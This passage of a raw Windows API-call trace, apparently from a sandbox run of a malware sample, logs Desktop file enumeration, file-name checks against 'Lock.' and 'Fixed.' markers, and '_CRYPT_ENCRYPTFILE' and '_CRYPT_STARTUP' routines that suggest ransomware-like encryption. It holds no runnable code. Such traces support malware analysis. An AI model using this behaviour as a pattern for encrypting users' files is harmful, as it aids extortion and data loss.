ftLastAccessTime.dwLowDateTime=0x1b53ae80, ftLastAccessTime.dwHighDateTime=0x1d5e1ef, ftLastWriteTime.dwLowDateTime=0x1b53ae80, ftLastWriteTime.dwHighDateTime=0x1d5e1ef, nFileSizeHigh=0x0, nFileSizeLow=0x96cc, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="wg77xQT1-Aj18nXa8K.swf", cAlternateFileName="WG77XQ~1.SWF")) returned 0 [0211.295] FindClose (in: hFindFile=0xa87390 | out: hFindFile=0xa87390) returned 1 [0211.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0211.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0211.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0211.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0211.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0211.295] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0211.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0211.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0211.296] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0211.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0211.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0211.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0211.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0211.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0211.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0211.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0211.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0211.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0211.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0211.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0211.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0211.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0211.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0211.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0211.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0211.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0211.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0211.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0211.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5e) returned 0x2e563a8 [0211.297] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/wg77xQT1-Aj18nXa8K.swf", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\wg77xQT1-Aj18nXa8K.swf", lpFilePart=0x8cf650*="wg77xQT1-Aj18nXa8K.swf") returned 0x2e [0211.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0211.297] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\wg77xQT1-Aj18nXa8K.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\wg77xqt1-aj18nxa8k.swf")) returned 0xffffffff [0211.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0211.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0211.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0211.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0211.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0211.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0211.297] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.298] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.298] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0211.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0211.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0211.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0211.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0211.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0211.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WUNf8 S 6YDp2i.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UNf8 S 6YDp2i.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nf8 S 6YDp2i.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f8 S 6YDp2i.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8 S 6YDp2i.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" S 6YDp2i.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S 6YDp2i.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 6YDp2i.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6YDp2i.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YDp2i.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dp2i.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p2i.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2i.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.299] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0211.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0211.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0211.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0211.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0211.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WUNf8 S 6YDp2i.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UNf8 S 6YDp2i.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nf8 S 6YDp2i.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f8 S 6YDp2i.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8 S 6YDp2i.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" S 6YDp2i.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S 6YDp2i.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 6YDp2i.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6YDp2i.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YDp2i.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dp2i.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p2i.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2i.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.300] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0211.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0211.300] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0211.300] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0211.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0211.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0211.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0211.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0211.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0211.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0211.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0211.300] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0211.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0211.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0211.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0211.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0211.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0211.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0211.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0211.301] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0211.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0211.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0211.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0211.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0211.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0211.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0211.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0211.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0211.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0211.301] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0211.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0211.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0211.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0211.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0211.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0211.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0211.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0211.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0211.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0211.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0211.302] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0211.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0211.302] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0211.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0211.302] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/WUNf8 S 6YDp2i.mp3", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437dfc90, ftCreationTime.dwHighDateTime=0x1d5e62b, ftLastAccessTime.dwLowDateTime=0xae61bd70, ftLastAccessTime.dwHighDateTime=0x1d5f126, ftLastWriteTime.dwLowDateTime=0xae61bd70, ftLastWriteTime.dwHighDateTime=0x1d5f126, nFileSizeHigh=0x0, nFileSizeLow=0x12cf6, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="WUNf8 S 6YDp2i.mp3", cAlternateFileName="WUNF8S~1.MP3")) returned 0xa870d0 [0211.303] FindClose (in: hFindFile=0xa870d0 | out: hFindFile=0xa870d0) returned 1 [0211.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0211.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0211.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0211.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0211.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0211.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0211.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0211.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0211.303] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0211.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0211.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0211.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0211.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0211.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0211.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0211.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0211.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0211.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0211.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0211.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0211.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0211.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0211.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0211.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0211.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0211.304] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0211.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0211.304] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0211.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0211.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0211.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0211.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0211.304] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0211.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0211.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0211.304] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0211.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0211.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0211.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0211.305] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0211.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0211.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0211.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0211.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0211.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0211.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0211.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0211.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0211.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0211.305] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0211.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0211.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0211.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0211.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0211.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0211.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0211.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0211.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0211.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0211.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0211.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0211.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0211.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0211.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0211.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0211.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0211.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0211.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0211.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0211.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0211.306] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0211.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0211.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0211.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0211.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0211.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0211.307] 